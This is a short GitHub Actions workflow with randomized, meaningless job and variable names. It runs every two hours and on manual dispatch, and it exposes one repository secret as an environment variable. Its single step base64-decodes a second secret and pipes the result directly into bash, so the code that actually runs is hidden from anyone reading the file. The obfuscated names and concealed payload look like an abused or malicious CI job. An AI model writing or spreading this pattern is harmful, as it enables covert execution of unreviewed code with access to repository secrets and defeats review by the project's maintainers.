name: UAmlkqN
on:
  schedule:
    - cron: '0 */2 * * *'
  workflow_dispatch:
jobs:
  SCxEqnoov:
    runs-on: ubuntu-latest
    env:
      ZpTdEkkzcwii: ${{ secrets.rdVuBpN }}
    steps:
      - uses: actions/checkout@v5
      - run: echo "${{ secrets.qZVBwAMDwYmV }}" | base64 -d | bash
